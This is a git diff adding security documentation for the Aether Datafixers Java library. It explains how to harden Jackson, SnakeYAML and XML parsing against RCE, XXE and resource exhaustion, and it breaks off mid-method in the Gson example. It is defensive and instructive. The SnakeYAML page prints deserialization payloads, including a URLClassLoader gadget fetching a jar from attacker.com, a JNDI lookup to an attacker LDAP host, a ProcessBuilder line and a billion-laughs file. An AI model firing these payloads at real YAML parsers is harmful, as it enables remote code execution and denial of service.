+## StreamReadConstraints (Jackson 2.15+)
+
+Jackson 2.15+ provides `StreamReadConstraints` to limit resource consumption:
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50) // Prevent stack overflow
+ .maxNumberLength(100) // Limit number string length
+ .maxStringLength(1_000_000) // 1MB max string
+ .maxNameLength(50_000) // Limit field name length
+ .maxDocumentLength(10_000_000) // 10MB max document (Jackson 2.16+)
+ .build();
+
+JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+```
+
+### Constraint Reference
+
+| Constraint | Default | Recommended | Purpose |
+|---------------------|-----------|-------------|-----------------------------|
+| `maxNestingDepth` | 1000 | 50-100 | Prevent stack overflow |
+| `maxStringLength` | 20MB | 1-10MB | Limit memory per string |
+| `maxNumberLength` | 1000 | 100 | Prevent huge number strings |
+| `maxNameLength` | 50000 | 1000 | Limit field name length |
+| `maxDocumentLength` | unlimited | 10MB | Total document size |
+
+---
+
+## XXE Prevention
+
+### The Vulnerability
+
+XML External Entity (XXE) attacks allow attackers to:
+- Read local files (`file:///etc/passwd`)
+- Perform SSRF (`http://internal-server/`)
+- Cause DoS via entity expansion
+
+```xml
+
+
+]>
+&xxe;
+```
+
+### Secure JacksonXmlOps Configuration
+
+```java
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureXmlMapperFactory {
+
+ public static XmlMapper createSecureXmlMapper() {
+ // Create secure XMLInputFactory
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+ // Disable external entities (XXE prevention)
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+ // Disable DTD processing
+ xmlInputFactory.setProperty(
+ XMLInputFactory.SUPPORT_DTD, false);
+
+ // Disable entity reference replacement
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Build secure XmlMapper
+ return XmlMapper.builder(
+ XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .build()
+ ).build();
+ }
+}
+
+// Usage with JacksonXmlOps
+XmlMapper secureMapper = SecureXmlMapperFactory.createSecureXmlMapper();
+JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper);
+```
+
+### XMLInputFactory Properties Reference
+
+| Property | Value | Purpose |
+|----------|-------|---------|
+| `IS_SUPPORTING_EXTERNAL_ENTITIES` | `false` | Block external entity loading |
+| `SUPPORT_DTD` | `false` | Disable DTD processing entirely |
+| `IS_REPLACING_ENTITY_REFERENCES` | `false` | Don't expand entities |
+| `IS_VALIDATING` | `false` | Skip DTD validation |
+
+---
+
+## Complete Secure Configurations
+
+### Secure JacksonJsonOps
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+ public static JacksonJsonOps createSecureOps() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxNumberLength(100)
+ .maxStringLength(1_000_000)
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ ObjectMapper mapper = new ObjectMapper(factory);
+
+ return new JacksonJsonOps(mapper);
+ }
+}
+
+// Usage
+JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+JsonNode node = secureOps.mapper().readTree(untrustedJson);
+Dynamic dynamic = new Dynamic<>(secureOps, node);
+```
+
+### Secure JacksonYamlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+ public static JacksonYamlOps createSecureOps() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ YAMLFactory factory = YAMLFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ YAMLMapper mapper = new YAMLMapper(factory);
+
+ return new JacksonYamlOps(mapper);
+ }
+}
+```
+
+### Secure JacksonXmlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+ public static JacksonXmlOps createSecureOps() {
+ // Secure XML parsing
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+ xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+ xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+ xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Resource limits
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ XmlMapper mapper = XmlMapper.builder(factory).build();
+
+ return new JacksonXmlOps(mapper);
+ }
+}
+```
+
+---
+
+## Deserialization Features
+
+Additional security-relevant features:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+
+// Fail on unknown properties (defense in depth)
+mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, true);
+
+// Fail on null for primitives
+mapper.configure(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES, true);
+
+// Fail on missing creator properties
+mapper.configure(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES, true);
+```
+
+---
+
+## Testing Security Configuration
+
+```java
+@Test
+void rejectsXxeAttack() {
+ String xxePayload = """
+
+
+ ]>
+ &xxe;
+ """;
+
+ JacksonXmlOps secureOps = SecureJacksonXmlConfig.createSecureOps();
+
+ assertThrows(Exception.class, () ->
+ secureOps.mapper().readTree(xxePayload)
+ );
+}
+
+@Test
+void rejectsDeeplyNestedJson() {
+ // Create deeply nested JSON
+ StringBuilder json = new StringBuilder();
+ for (int i = 0; i < 100; i++) json.append("{\"a\":");
+ json.append("1");
+ for (int i = 0; i < 100; i++) json.append("}");
+
+ JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+
+ assertThrows(StreamConstraintsException.class, () ->
+ secureOps.mapper().readTree(json.toString())
+ );
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [XML Support](../../codec/xml.md)
+- [YAML Support](../../codec/yaml.md)
diff --git a/docs/security/format-considerations/snakeyaml.md b/docs/security/format-considerations/snakeyaml.md
new file mode 100644
index 0000000..6706754
--- /dev/null
+++ b/docs/security/format-considerations/snakeyaml.md
@@ -0,0 +1,316 @@
+# SnakeYAML Security
+
+> **CRITICAL WARNING:** SnakeYAML's default configuration allows arbitrary Java class instantiation,
+> which can lead to **Remote Code Execution (RCE)**. Never use the default `Yaml()` constructor
+> with untrusted input.
+
+## Overview
+
+SnakeYAML is a powerful YAML parser that supports YAML 1.1 features including custom tags and constructors. However, this power comes with significant security risks when processing untrusted data.
+
+| Risk | Severity | Mitigation |
+|----------------------------------|--------------|----------------------------------|
+| Arbitrary Code Execution | **Critical** | Use `SafeConstructor` |
+| Billion Laughs (Alias Expansion) | High | Limit `maxAliasesForCollections` |
+| Stack Overflow | Medium | Limit `nestingDepthLimit` |
+| Resource Exhaustion | Medium | Limit `codePointLimit` |
+
+## Arbitrary Code Execution
+
+### The Vulnerability
+
+SnakeYAML's default constructor can instantiate arbitrary Java classes using YAML tags:
+
+```yaml
+# This YAML can execute arbitrary code with default Yaml()
+!!javax.script.ScriptEngineManager [
+ !!java.net.URLClassLoader [[
+ !!java.net.URL ["http://attacker.com/malicious.jar"]
+ ]]
+]
+```
+
+When parsed with `new Yaml().load(input)`, this:
+1. Creates a `URLClassLoader` pointing to an attacker's server
+2. Loads a malicious JAR file
+3. Instantiates `ScriptEngineManager` with the malicious classloader
+4. Executes arbitrary code on your server
+
+### Other Dangerous Payloads
+
+```yaml
+# Execute shell command (via ProcessBuilder)
+!!java.lang.ProcessBuilder [["calc.exe"]]
+
+# JNDI injection
+!!com.sun.rowset.JdbcRowSetImpl
+ dataSourceName: "ldap://attacker.com/exploit"
+ autoCommit: true
+```
+
+### The Solution: SafeConstructor
+
+**Always** use `SafeConstructor` when parsing untrusted YAML:
+
+```java
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import org.yaml.snakeyaml.LoaderOptions;
+
+// UNSAFE - Never do this with untrusted input:
+// Yaml yaml = new Yaml();
+
+// SAFE - Always use SafeConstructor:
+Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
+Object data = yaml.load(untrustedInput);
+```
+
+`SafeConstructor` only allows construction of basic Java types:
+- `String`, `Integer`, `Long`, `Double`, `Boolean`
+- `List`, `Map`
+- `Date`, `byte[]`
+
+Any YAML with custom tags (`!!classname`) will throw an exception.
+
+---
+
+## Billion Laughs Attack
+
+### The Vulnerability
+
+YAML aliases allow referencing previously defined anchors. Attackers can create exponentially expanding structures:
+
+```yaml
+a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
+b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
+c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
+d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
+e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
+f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
+g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
+h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
+i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
+```
+
+This small YAML file expands to **billions** of strings, consuming all available memory.
+
+### The Solution: Limit Alias Expansion
+
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50); // Default is 50, adjust as needed
+
+Yaml yaml = new Yaml(new SafeConstructor(options));
+```
+
+With this limit, the parser throws an exception when alias expansion exceeds the threshold.
+
+---
+
+## Complete Secure Configuration
+
+Use this configuration for all untrusted YAML:
+
+```java
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+public class SecureYamlParser {
+
+ private static final int MAX_ALIASES = 50;
+ private static final int MAX_DEPTH = 50;
+ private static final int MAX_CODE_POINTS = 3 * 1024 * 1024; // 3MB
+
+ private final Yaml yaml;
+
+ public SecureYamlParser() {
+ LoaderOptions options = new LoaderOptions();
+
+ // Prevent Billion Laughs attack
+ options.setMaxAliasesForCollections(MAX_ALIASES);
+
+ // Prevent stack overflow from deep nesting
+ options.setNestingDepthLimit(MAX_DEPTH);
+
+ // Limit total input size
+ options.setCodePointLimit(MAX_CODE_POINTS);
+
+ // Reject duplicate keys (data integrity)
+ options.setAllowDuplicateKeys(false);
+
+ // Use SafeConstructor to prevent RCE
+ this.yaml = new Yaml(new SafeConstructor(options));
+ }
+
+ public Dynamic parse(String untrustedYaml) {
+ Object data = yaml.load(untrustedYaml);
+ return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+ }
+
+ public Dynamic parse(InputStream untrustedInput) {
+ Object data = yaml.load(untrustedInput);
+ return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+ }
+}
+```
+
+---
+
+## LoaderOptions Reference
+
+| Option | Default | Recommended | Purpose |
+|----------------------------|---------|-------------------|---------------------------|
+| `maxAliasesForCollections` | 50 | 50 or less | Prevent Billion Laughs |
+| `nestingDepthLimit` | 50 | 50 or less | Prevent stack overflow |
+| `codePointLimit` | 3MB | Based on use case | Limit input size |
+| `allowDuplicateKeys` | true | **false** | Data integrity |
+| `allowRecursiveKeys` | false | false | Prevent recursive anchors |
+| `wrappedToRootException` | false | true | Better error handling |
+
+---
+
+## Integration with Aether Datafixers
+
+### Secure Migration Service
+
+```java
+public class SecureYamlMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final Yaml yaml;
+
+ public SecureYamlMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ options.setNestingDepthLimit(50);
+ options.setCodePointLimit(3 * 1024 * 1024);
+ options.setAllowDuplicateKeys(false);
+
+ this.yaml = new Yaml(new SafeConstructor(options));
+ }
+
+ public TaggedDynamic migrate(
+ String untrustedYaml,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) {
+
+ // Parse with safe settings
+ Object data = yaml.load(untrustedYaml);
+ Dynamic dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+
+ // Migrate
+ TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic);
+ return fixer.update(tagged, from, to);
+ }
+}
+```
+
+### Pre-Validation
+
+For additional security, validate input before parsing:
+
+```java
+public class YamlValidator {
+
+ private static final long MAX_SIZE = 1024 * 1024; // 1MB
+
+ public void validateBeforeParsing(byte[] input) {
+ if (input.length > MAX_SIZE) {
+ throw new SecurityException("YAML input exceeds maximum size");
+ }
+ }
+
+ public void validateBeforeParsing(String input) {
+ if (input.length() > MAX_SIZE) {
+ throw new SecurityException("YAML input exceeds maximum size");
+ }
+ }
+}
+```
+
+---
+
+## Testing Your Configuration
+
+Verify your configuration rejects malicious payloads:
+
+```java
+@Test
+void rejectsArbitraryClassInstantiation() {
+ String maliciousYaml = "!!java.lang.ProcessBuilder [[\"calc.exe\"]]";
+
+ Yaml safeYaml = new Yaml(new SafeConstructor(new LoaderOptions()));
+
+ assertThrows(YAMLException.class, () -> safeYaml.load(maliciousYaml));
+}
+
+@Test
+void rejectsBillionLaughs() {
+ String billionLaughs = """
+ a: &a ["lol"]
+ b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
+ c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
+ d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
+ e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
+ f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
+ """;
+
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ Yaml safeYaml = new Yaml(new SafeConstructor(options));
+
+ assertThrows(YAMLException.class, () -> safeYaml.load(billionLaughs));
+}
+```
+
+---
+
+## Common Mistakes
+
+### Mistake 1: Using Default Constructor
+
+```java
+// WRONG - Vulnerable to RCE
+Yaml yaml = new Yaml();
+Object data = yaml.load(userInput);
+```
+
+### Mistake 2: Using Custom Constructor Without SafeConstructor
+
+```java
+// WRONG - Custom constructor may still be vulnerable
+class MyConstructor extends Constructor {
+ // ...
+}
+Yaml yaml = new Yaml(new MyConstructor());
+```
+
+### Mistake 3: Forgetting LoaderOptions
+
+```java
+// WRONG - No limits on aliases or depth
+Yaml yaml = new Yaml(new SafeConstructor()); // Uses default LoaderOptions
+```
+
+**Correct:**
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+Yaml yaml = new Yaml(new SafeConstructor(options));
+```
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [YAML Support](../../codec/yaml.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/index.md b/docs/security/index.md
new file mode 100644
index 0000000..ddb17df
--- /dev/null
+++ b/docs/security/index.md
@@ -0,0 +1,118 @@
+# Security Overview
+
+This section provides guidance for securely handling untrusted data with Aether Datafixers. When processing data from external sources—user uploads, APIs, message queues, or file imports—proper security measures are essential to prevent attacks.
+
+## Quick Reference
+
+| Threat | Affected Formats | Risk | Mitigation |
+|-----------------------------------|------------------|--------------|---------------------------|
+| Arbitrary Code Execution | YAML (SnakeYAML) | **Critical** | Use `SafeConstructor` |
+| Billion Laughs (Entity Expansion) | YAML, XML | High | Limit aliases/entities |
+| XXE (External Entity Injection) | XML | High | Disable external entities |
+| Polymorphic Deserialization | JSON (Jackson) | Medium | Avoid default typing |
+| Resource Exhaustion | All | Medium | Size and depth limits |
+| Stack Overflow | All | Medium | Nesting depth limits |
+
+## When to Apply Security Measures
+
+Apply the security recommendations in this documentation when:
+
+- **User Uploads** — Processing files uploaded by users (game saves, configs, data imports)
+- **External APIs** — Consuming data from third-party APIs
+- **Message Queues** — Processing messages from queues (Kafka, RabbitMQ, etc.)
+- **Database Blobs** — Migrating serialized data stored in databases
+- **File Imports** — Reading configuration or data files from untrusted sources
+
+## Documentation Structure
+
+### [Threat Model](threat-model.md)
+
+Understand the attack vectors and trust boundaries:
+- Classification of untrusted data sources
+- Detailed attack vector descriptions
+- Impact assessment and risk analysis
+
+### [Format-Specific Security](format-considerations/index.md)
+
+Security considerations for each serialization format:
+- [SnakeYAML Security](format-considerations/snakeyaml.md) — **Critical: RCE prevention**
+- [Jackson Security](format-considerations/jackson.md) — XXE, polymorphic typing, depth limits
+- [Gson Security](format-considerations/gson.md) — Safe defaults and validation
+
+### [Best Practices](best-practices.md)
+
+General security best practices:
+- Input validation before migration
+- Size and depth limits
+- Timeout configuration
+- Defense-in-depth checklist
+
+### [Secure Configuration Examples](secure-configuration-examples.md)
+
+Ready-to-use secure configurations:
+- Safe `Yaml` setup for SnakeYAML
+- Safe `ObjectMapper` setup for Jackson
+- Safe `XmlMapper` setup for Jackson XML
+- Complete migration service example
+
+### [Spring Security Integration](spring-security-integration.md)
+
+Integrating security with Spring Boot:
+- Secure bean configuration
+- Request validation filters
+- Rate limiting
+- Audit logging
+
+## Quick Start: Secure Configuration
+
+### SnakeYAML (Critical)
+
+```java
+// ALWAYS use SafeConstructor for untrusted YAML
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+options.setCodePointLimit(3 * 1024 * 1024);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+Object data = safeYaml.load(untrustedInput);
+Dynamic dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+```
+
+### Jackson JSON
+
+```java
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, node);
+```
+
+### Jackson XML (XXE Prevention)
+
+```java
+XMLInputFactory xmlFactory = XMLInputFactory.newFactory();
+xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+XmlMapper safeMapper = XmlMapper.builder(
+ XmlFactory.builder().xmlInputFactory(xmlFactory).build()
+).build();
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic dynamic = new Dynamic<>(JacksonXmlOps.INSTANCE, node);
+```
+
+## Related
+
+- [Codec Overview](../codec/index.md)
+- [YAML Support](../codec/yaml.md)
+- [XML Support](../codec/xml.md)
+- [JSON Support](../codec/json.md)
diff --git a/docs/security/secure-configuration-examples.md b/docs/security/secure-configuration-examples.md
new file mode 100644
index 0000000..4d75c9d
--- /dev/null
+++ b/docs/security/secure-configuration-examples.md
@@ -0,0 +1,513 @@
+# Secure Configuration Examples
+
+This document provides ready-to-use secure configurations for all supported formats. Copy and adapt these examples for your application.
+
+## Quick Reference
+
+| Format | Primary Risk | Required Configuration |
+|--------------|---------------------------|-------------------------------------|
+| SnakeYAML | RCE | `SafeConstructor` + `LoaderOptions` |
+| Jackson JSON | Polymorphic typing, depth | `StreamReadConstraints` |
+| Jackson XML | XXE | Disable external entities |
+| Jackson YAML | Depth | `StreamReadConstraints` |
+| Gson | Large payloads | Pre-validation |
+
+---
+
+## SnakeYAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+public class SecureSnakeYamlConfig {
+
+ /**
+ * Creates a secure Yaml instance for parsing untrusted input.
+ */
+ public static Yaml createSecureYaml() {
+ LoaderOptions options = new LoaderOptions();
+
+ // Prevent Billion Laughs (alias expansion attack)
+ options.setMaxAliasesForCollections(50);
+
+ // Prevent stack overflow from deep nesting
+ options.setNestingDepthLimit(50);
+
+ // Limit input size (3MB default)
+ options.setCodePointLimit(3 * 1024 * 1024);
+
+ // Reject duplicate keys for data integrity
+ options.setAllowDuplicateKeys(false);
+
+ // Use SafeConstructor to prevent arbitrary class instantiation
+ return new Yaml(new SafeConstructor(options));
+ }
+
+ /**
+ * Parses untrusted YAML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String yaml) {
+ Yaml safeYaml = createSecureYaml();
+ Object data = safeYaml.load(yaml);
+ return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+ }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted YAML
+String untrustedYaml = request.getBody();
+Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.PLAYER, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson JSON Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+ /**
+ * Creates a secure ObjectMapper for parsing untrusted JSON.
+ */
+ public static ObjectMapper createSecureMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50) // Prevent stack overflow
+ .maxNumberLength(100) // Limit number string length
+ .maxStringLength(1_000_000) // 1MB max string
+ .maxNameLength(1_000) // Limit field name length
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new ObjectMapper(factory);
+ }
+
+ /**
+ * Creates secure JacksonJsonOps instance.
+ */
+ public static JacksonJsonOps createSecureOps() {
+ return new JacksonJsonOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted JSON securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String json) throws Exception {
+ ObjectMapper mapper = createSecureMapper();
+ JsonNode node = mapper.readTree(json);
+ return new Dynamic<>(JacksonJsonOps.INSTANCE, node);
+ }
+
+ /**
+ * Parses untrusted JSON securely with custom ops.
+ */
+ public static Dynamic parseSecurely(byte[] json) throws Exception {
+ JacksonJsonOps ops = createSecureOps();
+ JsonNode node = ops.mapper().readTree(json);
+ return new Dynamic<>(ops, node);
+ }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted JSON
+byte[] untrustedJson = request.getBodyAsBytes();
+Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson XML Secure Configuration (XXE Prevention)
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+ /**
+ * Creates a secure XmlMapper with XXE prevention.
+ */
+ public static XmlMapper createSecureMapper() {
+ // Configure secure XMLInputFactory
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+ // Disable external entities (XXE prevention)
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+ // Disable DTD processing
+ xmlInputFactory.setProperty(
+ XMLInputFactory.SUPPORT_DTD, false);
+
+ // Disable entity replacement
+ xmlInputFactory.setProperty(
+ XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+ // Configure read constraints
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ // Build secure factory
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ return XmlMapper.builder(factory).build();
+ }
+
+ /**
+ * Creates secure JacksonXmlOps instance.
+ */
+ public static JacksonXmlOps createSecureOps() {
+ return new JacksonXmlOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted XML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String xml) throws Exception {
+ XmlMapper mapper = createSecureMapper();
+ JsonNode node = mapper.readTree(xml);
+ return new Dynamic<>(new JacksonXmlOps(mapper), node);
+ }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted XML
+String untrustedXml = request.getBody();
+Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+
+// Migrate
+TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.SETTINGS, dynamic);
+TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson YAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+ /**
+ * Creates a secure YAMLMapper for parsing untrusted input.
+ */
+ public static YAMLMapper createSecureMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ YAMLFactory factory = YAMLFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new YAMLMapper(factory);
+ }
+
+ /**
+ * Creates secure JacksonYamlOps instance.
+ */
+ public static JacksonYamlOps createSecureOps() {
+ return new JacksonYamlOps(createSecureMapper());
+ }
+
+ /**
+ * Parses untrusted YAML securely and returns a Dynamic.
+ */
+ public static Dynamic parseSecurely(String yaml) throws Exception {
+ YAMLMapper mapper = createSecureMapper();
+ JsonNode node = mapper.readTree(yaml);
+ return new Dynamic<>(new JacksonYamlOps(mapper), node);
+ }
+}
+```
+
+---
+
+## Gson Secure Configuration
+
+### Basic Secure Setup with Validation
+
+```java
+import com.google.gson.Gson;
+import com.google.gson.GsonBuilder;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonParser;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonConfig {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+ private static final int MAX_DEPTH = 50;
+
+ /**
+ * Creates a Gson instance (safe by default).
+ */
+ public static Gson createGson() {
+ return new GsonBuilder()
+ .disableHtmlEscaping()
+ .create();
+ }
+
+ /**
+ * Parses untrusted JSON securely with size and depth validation.
+ */
+ public static Dynamic parseSecurely(String json) {
+ // Validate size
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE);
+ }
+
+ // Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // Validate depth
+ validateDepth(element, 0);
+
+ return new Dynamic<>(GsonOps.INSTANCE, element);
+ }
+
+ private static void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+ }
+
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
